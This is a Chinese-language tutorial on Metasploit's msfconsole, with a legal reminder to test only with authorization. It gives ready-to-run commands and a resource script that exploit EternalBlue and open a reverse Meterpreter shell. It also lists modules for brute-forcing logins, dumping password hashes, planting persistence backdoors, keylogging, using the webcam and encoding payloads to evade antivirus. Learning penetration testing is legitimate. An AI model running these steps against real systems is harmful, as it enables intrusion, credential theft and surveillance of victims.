黑客msfconsole渗透工具超详细使用说明
Metasploit Framework的msfconsole是一个功能强大的渗透测试框架,核心在于其模块化结构。你可以通过组合不同的模块,构建完整的测试流程。下表概述了其核心模块类型及典型用途:
|
模块类型 |
主要功能 |
典型应用场景举例 |
常用命令/关键词 |
|
辅助模块 (Auxiliary) |
信息收集、扫描、拒绝服务攻击等。 |
端口扫描、服务指纹识别、弱口令爆破。 |
auxiliary/scanner/ |
|
渗透攻击模块 (Exploit) |
利用特定漏洞获得目标系统初始访问权限。 |
攻击已知漏洞的Samba、VSFTPD服务。 |
exploit/ |
|
攻击载荷 (Payload) |
在成功渗透后,在目标系统上运行的代码。 |
获取反向Shell(reverse_tcp)、Meterpreter高级控制。 |
set payload |
|
编码器 (Encoder) |
对攻击载荷进行编码,以绕过杀毒软件(AV)检测。 |
在生成木马文件前对载荷进行多重编码。 |
msfvenom -e |
|
后渗透模块 (Post) |
在已控制目标后,进行信息收集、权限提升、内网移动等。 |
检查是否为虚拟机、获取密码哈希、安装后门。 |
post/ |
Metasploit Framework(简称 MSF)是业界最著名的开源渗透测试平台之一,由 Rapid7 维护。msfconsole 是其命令行交互式界面,功能强大、模块丰富,广泛用于漏洞利用、后渗透、信息收集等任务。
以下是对 msfconsole 的超详细使用说明,包括核心概念、常用命令、各功能模块详解及实战示例。
一、基本概念
1. Metasploit 模块类型
- Exploit(漏洞利用模块):利用目标系统中的漏洞执行代码。
- Payload(载荷):在成功利用后执行的代码,如反弹 shell、Meterpreter 等。
- Auxiliary(辅助模块):用于扫描、枚举、DoS、嗅探等非直接攻击任务。
- Post(后渗透模块):在获得会话后执行的提权、信息收集、持久化等操作。
- Encoder(编码器):对 payload 进行编码以绕过 AV/IDS。
- NOP(空指令生成器):用于堆栈溢出等场景。
- Evasion(规避模块):生成可绕过杀毒软件的恶意文件(较新版本支持)。
二、启动 msfconsole
bash
编辑
msfconsole
首次启动会加载数据库(建议配置 PostgreSQL 以启用数据库功能)。
三、常用全局命令(在 msfconsole 中)
表格
|
命令 |
功能 |
|
help 或 ? |
显示帮助 |
|
show exploits |
列出所有 exploit 模块 |
|
show auxiliary |
列出辅助模块 |
|
show payloads |
列出可用 payload |
|
show options |
显示当前模块所需参数 |
|
use <module> |
加载指定模块(如 use exploit/windows/smb/ms17_010_eternalblue) |
|
set <OPTION> <VALUE> |
设置模块参数 |
|
unset <OPTION> |
取消设置 |
|
setg <OPTION> <VALUE> |
全局设置(所有模块共享) |
|
getg |
查看全局变量 |
|
info <module> |
查看模块详细信息 |
|
search <keyword> |
搜索模块(支持 CVE、平台、类型等) |
|
jobs |
查看后台任务 |
|
sessions |
查看已建立的会话 |
|
exit / quit |
退出 |
四、核心模块详解
1. Exploit 模块使用流程
示例:利用 EternalBlue (MS17-010)
bash
编辑
msf6 > search ms17_010
# 选择 exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 查看选项
msf6 > show options
# 设置必要参数
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > set LPORT 4444
# 执行攻击
msf6 > exploit
成功后将获得一个 Meterpreter 会话。
2. Payload 类型说明
- Staged vs Stageless
- Staged(分阶段):先传小 stub,再下载完整 payload(如 windows/meterpreter/reverse_tcp)
- Stageless(无阶段):一次性传输完整 payload(如 windows/x64/meterpreter_reverse_tcp)
- 常见 Payload
- cmd/unix/reverse_netcat:简单反向 shell(Unix)
- windows/shell/reverse_tcp:Windows 命令行 shell
- windows/meterpreter/reverse_https:加密通信的高级后渗透 shell
3. Auxiliary(辅助)模块
用于信息收集或漏洞探测,不直接执行 payload。
示例:SMB 版本扫描
bash
编辑
msf6 > use auxiliary/scanner/smb/smb_version
msf6 > set RHOSTS 192.168.1.0/24
msf6 > run
其他常用辅助模块:
- scanner/portscan/tcp:TCP 端口扫描
- scanner/http/dir_scanner:目录爆破
- scanner/ssh/ssh_login:SSH 暴力破解
- admin/http/tomcat_administration:Tomcat 后台爆破
4. Post(后渗透)模块
在已有 Meterpreter 会话中使用。
bash
编辑
msf6 > sessions -i 1 # 进入会话 1
meterpreter > sysinfo # 查看系统信息
# 返回 msfconsole 后运行 post 模块
msf6 > use post/windows/gather/enum_logged_on_users
msf6 > set SESSION 1
msf6 > run
常用 Post 模块:
- post/windows/manage/enable_rdp:开启远程桌面
- post/windows/gather/hashdump:导出 SAM 哈希
- post/multi/recon/local_exploit_suggester:本地提权建议
- post/windows/manage/persistence:添加持久化后门
5. Meterpreter 高级 Shell
Meterpreter 是 Metasploit 最强大的 payload,内存驻留、加密通信、可扩展。
常用 Meterpreter 命令:
表格
|
命令 |
功能 |
|
sysinfo |
系统信息 |
|
getuid |
当前用户 |
|
ps |
进程列表 |
|
migrate <PID> |
迁移到其他进程(防崩溃) |
|
shell |
获取系统 shell |
|
download / upload |
文件传输 |
|
screenshot |
截图 |
|
webcam_list / webcam_snap |
调用摄像头 |
|
keyscan_start / keyscan_dump |
键盘记录 |
|
run post/windows/manage/migrate |
自动迁移到 explorer.exe |
五、数据库集成(强烈推荐)
Metasploit 支持 PostgreSQL 数据库存储扫描结果、主机信息等。
初始化数据库(Kali Linux 默认已配置):
bash
编辑
sudo systemctl start postgresql
sudo msfdb init
在 msfconsole 中验证:
bash
编辑
msf6 > db_status
[*] Connected to msf
导入 Nmap 扫描结果:
bash
编辑
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services
六、资源脚本(自动化)
可编写 .rc 脚本实现自动化渗透。
example.rc:
rc
编辑
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit -j
运行:
bash
编辑
msfconsole -r example.rc
七、安全与法律提醒 ⚠️
- 仅限授权测试:未经授权的渗透测试属于违法行为。
- 实验环境隔离:建议在虚拟机(如 VMware + NAT 网络)中练习。
- 更新 MSF:定期运行 msfupdate 获取最新漏洞模块。
八、学习资源推荐
- 官方文档:https://docs.metasploit.com/
- Metasploit Unleashed(免费课程):https://www.offensive-security.com/metasploit-unleashed/
- 书籍:《Metasploit: The Penetration Tester’s Guide》
浙公网安备 33010602011771号